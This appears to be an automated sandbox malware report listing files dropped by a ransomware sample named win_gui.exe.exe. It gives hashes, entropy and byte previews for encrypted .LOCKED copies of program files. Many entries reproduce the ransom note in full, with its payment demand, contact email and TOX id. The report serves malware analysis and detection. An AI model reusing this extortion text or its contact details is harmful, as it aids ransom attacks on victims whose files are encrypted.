                                Preview:......78X....g....P.r2...?...|...w.J....`&0V..U..q.Fz3..v.2.vTP.......eK;.?{.S..0.^....^.9|ML.I/)..........}.9Eg......L)p.B()[.Z.x....Y.q.B..tF...G................e..X!.:.<&.S.......6..BhI....?n.1.._......:.g..y....!<`P......;......x-.@.....K2..0..BJM)...........;D]q..-UH.;..1.Nl`c].X.t...G.f......&DI..K...j\....?fwJX_+o. .....F.B...:0@HV{.....@M....ZBT..3..G.r.x.r...5..n.Z.Hc..dZ..G0....2p...l..Az...&B.{.s.'...jm$n.}.......4...v..n.kq..E..m....U$.....6.....D<a...E..vA..1.r...J?....P:.F..r.s.vZ.,p.8y.,.....s.eD.u.*W.'...s|...y|..,.....Qi.*@M4....Ms\q.S0...vE.D.a..I]=;..y.3..W......J........@].?......^.D3.K4+.[.vK.t..,..qh.d...8...h..a.}/aJ......V.$./w...A..1....-.W'...$_}:hY..p=..gk.......6x...1....0..}S.Zx.l?.<n.Kq.x.:[..,...p..."Wv...nZ.L..*D...4~............p(r.h.A....vPn.#..n...Y&.!.17.?a.w ..q..:..4[.Z..$..5k..".Lv*....."...*k.nA**.zE-...Z.....k..........J..G......&W..D4,..#.8....xds..$.F.]1$k....H.Y..k`..t.u=.....].H.\.s...D.+`...^RV.......

                                C:\Program Files\7-Zip\Uninstall.exe

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):15456
                                Entropy (8bit):7.988455815318667
                                Encrypted:false
                                SSDEEP:384:AkGL9uFJsjcnbGqc8VKmxwb+Z2gFA4061Lw5Gj9+VOV:Aka9iJsjcnbAmJZ2im6pw5+J
                                MD5:DBDAB4B6C4576FDDD649B040817E9C30
                                SHA1:47F6C690BF84AE990D5E0EA93E735C380DAA8890
                                SHA-256:4F85EB205F3AD5F303BE0CBAD50C2C5B91C2146C2ABFECE711E56531C10ACBB1
                                SHA-512:151402DD1EE5C2F116C1C85AC28103770CB2BAF1DEAB9D1DF852C53FA42D6523722121C2B16E46DE1B358F90E05D78DCC924483E5BB66D12F4D6B7FA541E965A
                                Malicious:true
                                Preview:.....p.':3(.(.i....".?b...A....i...........~.......<o./.2..r.393....P!...t...~.3b..{..*.|>$eg/0.x.Ku)......W...m6.l..j.....pm..Z~?{......N[_.X.[.ev.b..{i*....=(........cLgb=2NNmZ..l..B...1.A...3....Ov...1r...W'..............c....7&....h..mP....Iq.3.2.1...r&......vr..<.1._+.F...h.L.rwg._....,.|..c..........(.26s9.$.*C.vd..D.U.x.od.-wY.._......w.D......C'.../..Q....Z.Ro-^....R...g..b.y..q...^...g.s.....K(/...ta.-K..&.nZ|!.]..).&.....*.....K.P.n..%..$...Z.'...bN....l...p3...........d.9e._.R.W:p'...x.W.6a.....4/./.F_....(.S..,../2...'.e.-W.H-X)$.S.SB..x.$O:...........p.......y....q.T..".R.y....g..O[M...\.C...B!.z...f".nJ`.:.[..=p....k+h..Dj....(.3...4pa..El%L.f.[...f..2.p...5.-...;47g.x.\.J^.u...w..U%uO;.....Q..0#.l......L..ISzH.}.....A.wP..<h..O..9..-gMk(.y.....%.....b...c.0h.ch,..5...e.....LM.,I...L..%.H.....((..m.J..K..<w...c.jm.u.5........2....H...V.yZ...&.hZ.>..C......7.i."...`.64..v..+.l.&f....\.a.i9.............*..P%Z.cW.U.

                                C:\Program Files\7-Zip\Uninstall.exe.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):15456
                                Entropy (8bit):7.988455815318667
                                Encrypted:false
                                SSDEEP:384:AkGL9uFJsjcnbGqc8VKmxwb+Z2gFA4061Lw5Gj9+VOV:Aka9iJsjcnbAmJZ2im6pw5+J
                                MD5:DBDAB4B6C4576FDDD649B040817E9C30
                                SHA1:47F6C690BF84AE990D5E0EA93E735C380DAA8890
                                SHA-256:4F85EB205F3AD5F303BE0CBAD50C2C5B91C2146C2ABFECE711E56531C10ACBB1
                                SHA-512:151402DD1EE5C2F116C1C85AC28103770CB2BAF1DEAB9D1DF852C53FA42D6523722121C2B16E46DE1B358F90E05D78DCC924483E5BB66D12F4D6B7FA541E965A
                                Malicious:false
                                Preview:.....p.':3(.(.i....".?b...A....i...........~.......<o./.2..r.393....P!...t...~.3b..{..*.|>$eg/0.x.Ku)......W...m6.l..j.....pm..Z~?{......N[_.X.[.ev.b..{i*....=(........cLgb=2NNmZ..l..B...1.A...3....Ov...1r...W'..............c....7&....h..mP....Iq.3.2.1...r&......vr..<.1._+.F...h.L.rwg._....,.|..c..........(.26s9.$.*C.vd..D.U.x.od.-wY.._......w.D......C'.../..Q....Z.Ro-^....R...g..b.y..q...^...g.s.....K(/...ta.-K..&.nZ|!.]..).&.....*.....K.P.n..%..$...Z.'...bN....l...p3...........d.9e._.R.W:p'...x.W.6a.....4/./.F_....(.S..,../2...'.e.-W.H-X)$.S.SB..x.$O:...........p.......y....q.T..".R.y....g..O[M...\.C...B!.z...f".nJ`.:.[..=p....k+h..Dj....(.3...4pa..El%L.f.[...f..2.p...5.-...;47g.x.\.J^.u...w..U%uO;.....Q..0#.l......L..ISzH.}.....A.wP..<h..O..9..-gMk(.y.....%.....b...c.0h.ch,..5...e.....LM.,I...L..%.H.....((..m.J..K..<w...c.jm.u.5........2....H...V.yZ...&.hZ.>..C......7.i."...`.64..v..+.l.&f....\.a.i9.............*..P%Z.cW.U.

                                C:\Program Files\7-Zip\descript.ion

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):974
                                Entropy (8bit):7.770514457064826
                                Encrypted:false
                                SSDEEP:24:4lX1yfsVF26XbTcSUV04BIyz/wpDyYPGTNj0hOHAVMJg6WXs9Uudy:u+qjXbYB/f/WyYu+MAVMJg6Ta8y
                                MD5:AB0F0C74F141651A3ED6AC97C2F13608
                                SHA1:A130A015ADB3FEF76BEC748E14BF1CD4A84F3331
                                SHA-256:7D31949D7E3E1DF02E798C73590BA3275FE534FA704E08072C5E7B076953E626
                                SHA-512:987BE153C741794FD644B921F8BF3A5A5E95B3CE2B62C76F0ADFB1DA98A99E33D2E3E78CAE099ED66D0C98375109DC7FDF775F72676DABA8E8DF8880B66CD76A
                                Malicious:false
                                Preview:...W.R...=A...~..F..&C.k...}.(.5...<..0.n..Av..-..z...z..5.$..Z......\s.%5....v.`....>g.=/o.C..._.B.C_.d..lMud[m[..U,.......+....Ne....Q(......P..]}...9J..s..Q..*7..$.G.7.....5...H......./... .0<...%w....z,.E.WC.....fe.E.*...qV..........;.)..X.v.g.7b.DM.{.iK..2,...^....v..=.UDk......l.]p...L8.p#.N.%...........`T......QS...T...C.Pjs......I.[.m....v...}V.../...JKE.Kq}.P}.5....J-=j.....p.;o-..H.._V...[..8.#.e..4dW`.W.9D=.=&..A....^D.6...AF..\..8...%..AT.S]...}[Q..-.XC<..c.:U.....UQ..*R...A..,.M7A.!..i#...A~.....].*_.`.Q.?....F..m..}.....PT....<e.M.o#.....Z/.....eU.zf.'._..W[c6....L..........j..\h0....Cl^.....)........J....`"./.5..H....?.d.5.......# ......./.G...X.Z^...l....R...(...i......N.".y..@..;........&..a...^.*....1%n.Ub\P|.@.EI..Q.vZ....)q.kW<....2....|=^UlF.......YA.t....Y.!<../....(.>.*.U...pCW....7eEa._.....Bl^.EU..:I...._.&.P.`.I.h.d.2>Z..!...N../5..I......f.............Y.jjii..n...................fk.W...f

                                C:\Program Files\7-Zip\descript.ion.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):974
                                Entropy (8bit):7.770514457064826
                                Encrypted:false
                                SSDEEP:24:4lX1yfsVF26XbTcSUV04BIyz/wpDyYPGTNj0hOHAVMJg6WXs9Uudy:u+qjXbYB/f/WyYu+MAVMJg6Ta8y
                                MD5:AB0F0C74F141651A3ED6AC97C2F13608
                                SHA1:A130A015ADB3FEF76BEC748E14BF1CD4A84F3331
                                SHA-256:7D31949D7E3E1DF02E798C73590BA3275FE534FA704E08072C5E7B076953E626
                                SHA-512:987BE153C741794FD644B921F8BF3A5A5E95B3CE2B62C76F0ADFB1DA98A99E33D2E3E78CAE099ED66D0C98375109DC7FDF775F72676DABA8E8DF8880B66CD76A
                                Malicious:false
                                Preview:...W.R...=A...~..F..&C.k...}.(.5...<..0.n..Av..-..z...z..5.$..Z......\s.%5....v.`....>g.=/o.C..._.B.C_.d..lMud[m[..U,.......+....Ne....Q(......P..]}...9J..s..Q..*7..$.G.7.....5...H......./... .0<...%w....z,.E.WC.....fe.E.*...qV..........;.)..X.v.g.7b.DM.{.iK..2,...^....v..=.UDk......l.]p...L8.p#.N.%...........`T......QS...T...C.Pjs......I.[.m....v...}V.../...JKE.Kq}.P}.5....J-=j.....p.;o-..H.._V...[..8.#.e..4dW`.W.9D=.=&..A....^D.6...AF..\..8...%..AT.S]...}[Q..-.XC<..c.:U.....UQ..*R...A..,.M7A.!..i#...A~.....].*_.`.Q.?....F..m..}.....PT....<e.M.o#.....Z/.....eU.zf.'._..W[c6....L..........j..\h0....Cl^.....)........J....`"./.5..H....?.d.5.......# ......./.G...X.Z^...l....R...(...i......N.".y..@..;........&..a...^.*....1%n.Ub\P|.@.EI..Q.vZ....)q.kW<....2....|=^UlF.......YA.t....Y.!<../....(.>.*.U...pCW....7eEa._.....Bl^.EU..:I...._.&.P.`.I.h.d.2>Z..!...N../5..I......f.............Y.jjii..n...................fk.W...f

                                C:\Program Files\7-Zip\readme.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\7-Zip\readme.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\locales\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\swiftshader\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\HostedServicesTemplates\ENU\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\ENU\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ENU\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ar_AE\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\cs_CZ\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
